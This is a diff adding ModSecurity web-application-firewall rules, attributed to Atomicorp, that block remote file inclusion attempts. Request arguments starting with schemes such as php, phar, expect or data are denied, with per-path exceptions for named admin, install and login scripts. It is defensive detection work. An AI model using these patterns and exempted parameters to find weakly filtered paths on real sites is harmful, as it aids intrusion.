+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:site_path "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340629,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:site_path "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340630,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91201
+
+SecRule REQUEST_FILENAME "/shopadmin/core\.php" "phase:2,id:91202,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91203,t:none,pass,nolog,skipAfter:END_RULES_91203"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:offer_copyright|!ARGS:offerDomain|!ARGS:con|!ARGS:offer_contactus|!ARGS:content|!ARGS:mail_content|!ARGS:reply "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340631,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:offer_copyright|!ARGS:offerDomain|!ARGS:con|!ARGS:offer_contactus|!ARGS:content|!ARGS:mail_content|!ARGS:reply "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340632,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91203
+
+SecRule REQUEST_FILENAME "/system/index\.php" "phase:2,id:91204,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91205,t:none,pass,nolog,skipAfter:END_RULES_91205"
+
+SecRule ARGS|!ARGS:/location/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^template/|!ARGS:/^field_id/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "capture,deny,log,auditlog,status:403,id:340633,phase:2,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/location/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^template/|!ARGS:/^field_id/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "capture,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340634,phase:2,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91205
+
+SecRule REQUEST_FILENAME "/mailer/truefm\.php" "phase:2,id:91206,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91207,t:none,pass,nolog,skipAfter:END_RULES_91207"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:forward|!ARGS:body_tag|!ARGS:http_referer|!ARGS:Address|!ARGS:Comment "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340635,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:forward|!ARGS:body_tag|!ARGS:http_referer|!ARGS:Address|!ARGS:Comment "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340636,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91207
+
+SecRule REQUEST_FILENAME "/ummmanager\.cgi" "phase:2,id:91208,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91209,t:none,pass,nolog,skipAfter:END_RULES_91209"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:login "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340637,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:login "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340638,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91209
+
+SecRule REQUEST_FILENAME "/install/step6\.php" "phase:2,id:91210,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91211,t:none,pass,nolog,skipAfter:END_RULES_91211"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^site_/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340639,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^site_/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340640,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91211
+
+SecRule REQUEST_FILENAME "/homecounter\.php" "phase:2,id:91212,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340024,ctl:ruleRemovebyID=340028,ctl:ruleRemovebyID=340151"
+
+SecRule REQUEST_FILENAME "/admincp/options\.php" "phase:2,id:91213,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91214,t:none,pass,nolog,skipAfter:END_RULES_91214"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:site_path|!ARGS:/^setting/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340641,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:site_path|!ARGS:/^setting/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340642,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91214
+
+SecRule REQUEST_FILENAME "/media/hochron\.html" "phase:2,id:91215,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91216,t:none,pass,nolog,skipAfter:END_RULES_91216"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:MemberSelectList "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340643,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:MemberSelectList "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340644,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91216
+
+SecRule REQUEST_FILENAME "/admin/settings/index\.php" "phase:2,id:91217,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91218,t:none,pass,nolog,skipAfter:END_RULES_91218"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^settings/|!ARGS:metaDescription "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340645,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^settings/|!ARGS:metaDescription "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340646,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91218
+
+SecRule REQUEST_FILENAME "/cmspopouts/shortcuts\.php" "phase:2,id:91219,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91220,t:none,pass,nolog,skipAfter:END_RULES_91220"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:target_title "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340647,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:target_title "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340648,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91220
+
+SecRule REQUEST_FILENAME "/manufacturers_edit\.php" "phase:2,id:91221,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91222,t:none,pass,nolog,skipAfter:END_RULES_91222"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^edit/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340649,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^edit/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340650,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91222
+
+SecRule REQUEST_FILENAME "/admin/contactmanage\.php" "phase:2,id:91223,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91224,t:none,pass,nolog,skipAfter:END_RULES_91224"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:response "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340651,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:response "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340652,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91224
+
+SecRule REQUEST_FILENAME "/giftcert\.php" "phase:2,id:91225,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91226,t:none,pass,nolog,skipAfter:END_RULES_91226"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:recipient_address "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340653,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:recipient_address "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340654,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91226
+
+SecRule REQUEST_FILENAME "/pages/news\.htm" "phase:2,id:91227,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91228,t:none,pass,nolog,skipAfter:END_RULES_91228"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:store "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340655,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:store "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340656,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91228
+
+SecRule REQUEST_FILENAME "/bb-login\.php" "phase:2,id:91229,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91230,t:none,pass,nolog,skipAfter:END_RULES_91230"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:re|!ARGS:_wp_http_referer "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340657,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:re|!ARGS:_wp_http_referer "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340658,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91230
+
+SecRule REQUEST_FILENAME "/adview\.php" "phase:2,id:91231,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91232,t:none,pass,nolog,skipAfter:END_RULES_91232"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:target1 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340659,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:target1 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340660,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91232
+
+SecRule REQUEST_FILENAME "/ajcart/cart\.php" "phase:2,id:91233,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91234,t:none,pass,nolog,skipAfter:END_RULES_91234"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:CARTDIR "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340661,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:CARTDIR "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340662,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91234
+
+SecRule REQUEST_FILENAME "/index\.php/install/-/configure" "phase:2,id:91235,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91236,t:none,pass,nolog,skipAfter:END_RULES_91236"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:DIR_REL "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:341661,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:DIR_REL "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:341662,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91236
+
+SecRule REQUEST_FILENAME "/store/zc_install/index\.php" "phase:2,id:91237,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
